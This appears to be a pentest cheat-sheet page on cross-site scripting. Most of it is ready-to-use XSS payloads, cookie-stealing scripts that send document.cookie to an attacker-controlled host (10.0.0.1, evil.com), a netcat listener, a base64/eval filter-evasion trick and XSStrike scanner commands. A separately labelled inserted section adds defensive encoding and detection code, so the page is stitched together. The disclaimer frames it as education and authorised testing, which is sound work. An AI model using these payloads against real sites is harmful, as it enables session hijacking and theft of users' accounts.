Cross-site scripting (XSS) enables attackers to inject client-side scripts into web applications.
Payloads
We can insert them into URL parameters, POST parameters or HTTP headers.

```html
<script>alert(1)</script>
"><script>alert(1)</script>
<script>alert(1)</script>
"><script>alert(1)</script>
'></script><script>alert(1)</script>
';alert(1);'
" src=1 onerror=alert(1)>
<><img src=1 onerror=alert(1)>
"><img src=1 onerror=alert(1)>
"></span><img src=1 onerror=alert(1)>
"><svg onload=alert(1)>
javascript:alert(1)
\"-alert(1)//
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
<a onmouseover=alert(1)>click</a>
" onmouseleave='alert(1)'">
<img src="jav ascript:alert(1)">
<img src="jav	ascript:alert(1)">
<img src="jav
ascript:alert(1)">
</textarea><script>alert(1)</script>
<script>fetch('/profile?new_password=password');</script>
/?q=&subparam=--><script>alert(1)</script>
/index.php#value='><script>alert(1)</script>
```
jQuery

```html
https://vulnerable.com/#<img src=1 onerror=alert(1)>
<iframe src="https://vulnerable.com/#" onload="this.src+='<img src=1 onerror=alert(1)>'">
```
AngularJS
If you find “<html ng-app>” or “<div ng-app>” in the HTML source code, the page runs AngularJS and you may be able to exploit it for XSS.

```
https://vulnerable.com/?search=
```
Cookie Stealing
Create the following payload for stealing cookies and inject it into the target web page.

```html
<!-- GET request -->
<script>fetch("http://10.0.0.1/?"+btoa(document.cookie));</script>
<!-- POST request -->
<script>
fetch("http://10.0.0.1/", {
  method: 'POST',
  mode: 'no-cors',
  body: document.cookie
});
</script>
```
Start a web server or listener on the local machine to receive the cookies.

```sh
sudo python3 -m http.server 80
# or
sudo nc -lvp 80
```
Filter Evasion
The website may sanitize inputs to block malicious code. However, we may be able to circumvent the filter by encoding our code, for example by converting the JavaScript to a Base64 string.

```js
fetch("http://evil.com/" + document.cookie);
// Base64: ZmV0Y2goImh0dHA6Ly9ldmlsLmNvbS8iICsgZG9jdW1lbnQuY29va2llKTs=
```
Insert the base64 string into the “eval” function as below.

```html
<!-- '(' => '\x28' -->
<!-- ')' => '\x29' -->
<img src="x" onerror=eval.call`${"eval\x28atob`ZmV...2EoZCkpKQo=`\x29"}`
```
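The defender's counterpart to the payload list and the filter-evasion trick above, as an added example that is not part of the original page: contextual output encoding that renders the injected markup inert, and a normalising detector (for WAF rules or log review) that undoes the evasions shown on this page before matching. It runs under Node.js; `SAMPLES` is a constructed set drawn from the payloads above.

```javascript
// Added example (not from the original page). (1) encodeForHtml neutralises
// the payloads for an HTML text/attribute context; (2) normalize + detect
// undo URL encoding, whitespace inside "javascript:" and base64 fed to
// atob()/eval before matching signatures. Node.js; SAMPLES are constructed.
const SAMPLES = [
  '"><script>alert(1)</script>',
  '<img src="jav\tascript:alert(1)">',
  '%3Cscript%3Ealert%281%29%3C%2Fscript%3E',
  '<img src=x onerror=eval(atob`ZmV0Y2goImh0dHA6Ly9ldmlsLmNvbS8iICsgZG9jdW1lbnQuY29va2llKTs=`)>',
  'hello world',
];

// (1) Every character the payloads rely on becomes an entity, so the browser
// never sees a tag, an attribute delimiter or an event handler.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Browsers ignore tabs/newlines inside the scheme, so match j<ws>a<ws>v... too.
const JS_URI = new RegExp('javascript:'.split('').join('[\\s\\x00-\\x1f]*'), 'gi');

// (2) Normalise: decode URL encoding, expand base64 handed to atob(), lower-case.
function normalize(input) {
  let s = String(input);
  for (let i = 0; i < 3; i++) {           // undo (possibly nested) URL encoding
    let d;
    try { d = decodeURIComponent(s); } catch { break; }
    if (d === s) break;
    s = d;
  }
  // Append the decoded base64 so a hidden fetch(...document.cookie) is visible.
  s = s.replace(/atob\s*[(`]\s*['"]?([A-Za-z0-9+/=]+)/g,
    (m, b64) => m + ' ' + Buffer.from(b64, 'base64').toString('utf8'));
  return s.toLowerCase().replace(JS_URI, 'javascript:');
}

const SIGNATURES = [
  [/<\s*script\b/, 'script tag'],
  [/\bon(error|load|mouseover|mouseleave|click)\s*=/, 'event handler attribute'],
  [/javascript:/, 'javascript: uri'],
  [/document\.cookie/, 'cookie access'],
  [/\beval\s*[(`]/, 'eval call'],
];

// Returns the names of all signatures that match the normalised input.
function detect(input) {
  const n = normalize(input);
  return SIGNATURES.filter(([re]) => re.test(n)).map(([, name]) => name);
}
```

Note that the detector is a monitoring aid, not a substitute for encoding: the blacklist can always be extended by the attacker, while `encodeForHtml` holds for any input in the context it targets.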
Automation
- XSStrike is an XSS scanner: https://github.com/s0md3v/XSStrike

```sh
# GET request
python xsstrike.py -u http://vulnerable.com/?param=test
# POST request
python xsstrike.py -u http://vulnerable.com/post --data "username=test&email=test&comment=test"
# data as JSON
python xsstrike.py -u http://vulnerable.com/comment --data '{"comment": "test"}' --json
```
Disclaimer
Exploit Notes are only for educational purposes or penetration testing, not for attacking servers that you're not authorized to test. This site will not take any responsibility even if you attack a server illegally or cause damage unintentionally. Please use the contents of this site at your own risk.
The contents of this site are not original, but based on information on the internet that the author actually tried and found to work. Although the author strives to post the latest information on the content of this site as much as possible, there is no guarantee that it will always be up to date.